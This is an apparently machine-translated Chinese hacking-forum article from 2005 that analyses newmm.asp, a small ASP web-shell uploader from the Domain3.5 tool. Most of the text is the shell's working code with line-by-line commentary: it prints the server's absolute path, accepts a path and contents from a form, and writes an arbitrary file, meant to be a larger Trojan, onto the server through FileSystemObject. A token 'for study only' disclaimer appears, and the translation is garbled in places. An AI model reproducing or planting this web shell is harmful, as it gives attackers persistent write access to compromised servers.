DIY. ASP Trojan analysis-vulnerability warning-the black bar safety net

ID MYHACK58:6220055610
Type myhack58
Reporter 佚名
Modified 2005-12-20T00:00:00


Today I give you analyze the domain3. 5 comes with one of the newmm. asp Trojan, everyone is familiar with. want to learn asp of some help

Open the original file, at the beginning of some of the style definition, I will not describe, because and our Trojan function has nothing to do

First look at the main static display section, are by<%response. write %>Output html section,the direct use of html language is also possible, you can experiment

  1. This document is the absolute path to F:\website\newmm. asp is by

<% =server. mappath(Request. ServerVariables("SCRIPT_NAME")) %>this script implemented

ServerVariables collection to retrieve a predetermined environment variable is an environment variable set SCRIPT_NAME the script execution of the virtual path is just one, there's such as the familiar remote_addr Usage:Request. ServerVariables (server environment variable)is made a predetermined environment variable value

server object MapPath method the specified relative or virtual path to map to the server the corresponding physical directory on the

Finally by the response. write the output,so it shows the document absolute path to F:\website\newmm. asp

  1. Save the file with the absolute path(including the file name:D:\web\x. asp):this is by response object to output static html code to achieve The code is as follows: <% Response. write "save the file<font color=red>the absolute path(including the file name:D:\web\x. asp):</font>" %>

  2. Enter the path to save the The code is as follows: Input save path:<% Response. Write "<input type=text name=syfdpath width=2 0 0 size=8 1>" %> Here the main attention to a name value, here is syfdpath,program through this variable to pass the user input text box to be saved to the server-side physical path, careful to include the file name

  3. Contents of the input file: The code is as follows: <% Response. write "Enter file content:" %> <% Response. write "<textarea name=cyfddata cols=8 0 rows=1 0 width=3 2></textarea>" %> Here also the main attention to the value of name, which is used to pass you have to submit the contents of a variable

  4. Submitted

There are these<title>ASP Trojan Http://WwW.Hkstudy.Com/</title> <div align="center">note: this program is only for study. Such as the use of this program for illegal purposes, the consequences conceited. <a href=""target="_blank">& amp; ... w. hkstudy. cn</font></a> Chinese bird base friendship to modify the version. Can be modified to your own, can be personalized

Below we mainly look at the fso processing section, this is the key, I think, the form who will Member, the specific processing it is not so simple

This is a self submitting form to process an asp Trojan We can from here see the<% Response. write "<form action=’ method=post>" %> action=’is empty, indicating that since the submission of the

The following is the process to submit a script

<% dim objFSO %> ’is not defined objFSO variable to indicate the fso of an object here is the vbs of the defined method, following identical <% dim fdata %> ’definition of fdata variable is used to represent the acquired user submitted content files <% dim objCountFile %> ’is not defined objCountFile variables has indicated a stream flow of the returned object <% on error resume next %> ’fault-tolerant, meaning that if the error continues executing, no error message <% Set objFSO = Server. createObject("Scripting. FileSystemObject") %> ’create a fso,and fso objects assigned to the objFSO variable <% if Trim(request("syfdpath"))<>"" then %> ’if you get the physical path is not empty then continue to make the user to submit the contents of the file <% fdata = request("cyfddata") %> ’the trim function is mainly to filter out the submission path at the beginning and end of spaces, to prevent the error <% Set objCountFile=objFSO. createTextFile(request("syfdpath"),True) %> ’fso createTextFile method according to the submission of the physical path in the server end established file, where must contain the file name,if file exists overwrite,true this parameter is the meaning of this <% objCountFile. Write fdata %>’returns the stream the stream object's write method to build the file, write the content, that is, you want to write the major points of the Trojans content <% if err =0 then %> ’error control, specifically with reference to the err object's properties and methods ’If there are no errors then show the save Success! <% response. write "<font color=#FFFF00>save Success!& lt;/font>" %> <% else %> <% response. write "<font color=#FFFF00>Save UnSuccess!& lt;/font>" %>’error control,if the error is displayed SaveUnSuccess! <% end if %> <% err. clear %> <% end if %> <% objCountFile. Close %> ’close the object <% Set objCountFile=Nothing %> ’empty the object <% Set objFSO = Nothing %>

This completes based on the physical path, and content on the server end to form a we need to the asp Trojan file Comment I simply take everyone to see, you can then take the time to double manual